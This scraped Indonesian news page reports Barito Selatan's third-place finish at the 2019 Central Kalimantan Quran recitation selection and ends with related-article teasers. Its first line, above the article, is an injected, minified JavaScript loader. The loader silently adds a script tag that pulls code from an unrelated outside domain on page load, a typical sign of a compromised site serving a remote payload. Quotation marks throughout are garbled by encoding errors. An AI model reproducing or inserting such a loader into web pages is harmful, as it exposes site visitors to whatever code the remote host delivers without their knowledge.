(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
BUNTOK, Kafilah Kabupaten Barito Selatan (Barsel) berhasil meraih peringkat ketiga di Seleksi Tilawatil Quran (STQ) XXII tingkat Provinsi Kalimantan Tengah yang berakhir Selasa (30/4/2019) lalu.
“Saya bangga dengan kafilah STQ Barsel yang mampu bersaing dengan daerah lain, walau harus puas diperingkat ketiga, dan kami akan selalu mendukung agar kedepan bisa menjadi lebih baik lagi,†kata Ketua LPTQ Barsel Muhammad Irfan SPd, Kamis (2/5/2019).
Irfan juga mengapresiasi masyarakat dan Lembaga Pengembangan Tilawatil Quran (LPTQ) Kabupaten Barsel, peserta, pelatih dan offisial telah berhasil berjuang untuk sampai di posisi peringkat ketiga.
Sekadar diketahui, juara umum diraih kafilah Kota Palangka Raya, peringkat I Kabupaten Katingan, peringkat II kafilah Barita Utara dan ketiga kafilah Barsel.
“Namun masuk di peringkat ketiga sudah cukup maksimal, capaian yang diraih kali ini harus menjadi pemicu untuk terus berlatih dan mengembangkan diri agar bisa meraih prestasi lebih maksimal lagi ke depan,†ujar Irfan.
Ditambahkan olehnya, untuk peringkat ketiga ini kafilah Barsel sudah berhasil membawa 20 tropi. Kafilah Barsel berhasil meloloskan di dua ajang.
“Yakni untuk tilawah 30 juz putri Jamilah dan untuk tilawah putra Muhammadun, keduanya dari kafilah STQ Barsel,†pungkas Irfan. (digdo)
KANALKALIMANTAN.COM, KUALA KAPUAS - Wakil Bupati Kapuas Dodo bersama jajaran menempuh jalur sungai dan darat… Read More
KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten (Pemkab) Hulu Sungai Utara (HSU) mendapatkan dukungan menjalankan pemerintahan bersih… Read More
KANALKALIMANTAN.COM, BANJARMASIN - Street Art Dakwah South Borneo memanfaatkan seni mural dan grafiti sebagai alat… Read More
KANALKALIMANTAN.COM, AMUNTAI – Massa yang tergabung dalam Lembaga Swadaya Masyarakat (LSM) Gerakan Organisasi Sosial Terintegritas… Read More
KANALKALIMANTAN.COM, PARINGIN - Wakil Bupati (Wabup) Balangan, Akhmad Fauzi, menyerahkan beasiswa program Kartu Balangan Pintar… Read More
KANALKALIMANTAN.COM, MARTAPURA – Kepala Dinas Komunikasi, Informatika, Statistik, dan Persandian (DKISP) Kabupaten Banjar HM Aidil… Read More
This website uses cookies.